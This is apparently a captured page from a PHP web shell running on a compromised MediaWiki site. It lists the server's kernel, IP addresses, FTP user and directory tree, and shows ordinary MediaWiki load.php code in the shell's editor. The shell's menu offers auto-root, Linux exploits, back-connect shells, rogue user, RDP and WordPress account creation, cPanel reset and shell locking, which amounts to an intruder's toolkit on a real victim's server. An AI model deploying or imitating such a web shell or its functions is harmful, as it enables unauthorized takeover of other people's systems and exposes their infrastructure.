Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
discover /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
cgi1-bin
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
maintenance
[ DIR ]
drwxr-xr-x
mediawiki-1.19.2
[ DIR ]
drwxr-xr-x
mw-config
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
serialized
[ DIR ]
drwxr-xr-x
skins
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitreview
95
B
-rw-r--r--
COPYING
17.46
KB
-rw-r--r--
CREDITS
2.99
KB
-rw-r--r--
FAQ
76
B
-rw-r--r--
HISTORY
508.59
KB
-rw-r--r--
INSTALL
3.29
KB
-rw-r--r--
LocalSettings.php
4.49
KB
-rw-r--r--
README
4.02
KB
-rw-r--r--
RELEASE-NOTES-1.19
25.04
KB
-rw-r--r--
StartProfiler.sample
408
B
-rw-r--r--
UPGRADE
11.3
KB
-rw-r--r--
api.php
4.75
KB
-rw-r--r--
api.php5
25
B
-rw-r--r--
img_auth.php
5.1
KB
-rw-r--r--
img_auth.php5
31
B
-rw-r--r--
index.php
2.31
KB
-rw-r--r--
index.php5
29
B
-rw-r--r--
load.php
1.78
KB
-rw-r--r--
load.php5
27
B
-rw-r--r--
mediawiki-1.19.2.tar.gz
17.42
MB
-rw-r--r--
opensearch_desc.php
3.01
KB
-rw-r--r--
opensearch_desc.php5
39
B
-rw-r--r--
profileinfo.php
9.21
KB
-rw-r--r--
redirect.php
510
B
-rw-r--r--
redirect.php5
31
B
-rw-r--r--
redirect.phtml
89
B
-rw-r--r--
testindex.html
352
B
-rw-r--r--
thumb.php
9.43
KB
-rw-r--r--
thumb.php5
29
B
-rw-r--r--
thumb_handler.php
229
B
-rw-r--r--
thumb_handler.php5
37
B
-rw-r--r--
wiki.phtml
86
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : load.php
<?php /** * This file is the entry point for the resource loader. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along * with this program; if not, write to the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. * http://www.gnu.org/copyleft/gpl.html * * @file * @author Roan Kattouw * @author Trevor Parscal * */ // Bail if PHP is too low if ( !function_exists( 'version_compare' ) || version_compare( phpversion(), '5.2.3' ) < 0 ) { require( dirname( __FILE__ ) . '/includes/PHPVersionError.php' ); wfPHPVersionError( 'load.php' ); } if ( isset( $_SERVER['MW_COMPILED'] ) ) { require ( 'phase3/includes/WebStart.php' ); } else { require ( dirname( __FILE__ ) . '/includes/WebStart.php' ); } wfProfileIn( 'load.php' ); // URL safety checks if ( !$wgRequest->checkUrlExtension() ) { return; } // Respond to resource loading request $resourceLoader = new ResourceLoader(); $resourceLoader->respond( new ResourceLoaderContext( $resourceLoader, $wgRequest ) ); wfProfileOut( 'load.php' ); wfLogProfilingData(); // Shut down the database. foo()->bar() syntax is not supported in PHP4, and this file // needs to *parse* in PHP4, although we'll never get down here to worry about = vs =& $lb = wfGetLBFactory(); $lb->shutdown();
Close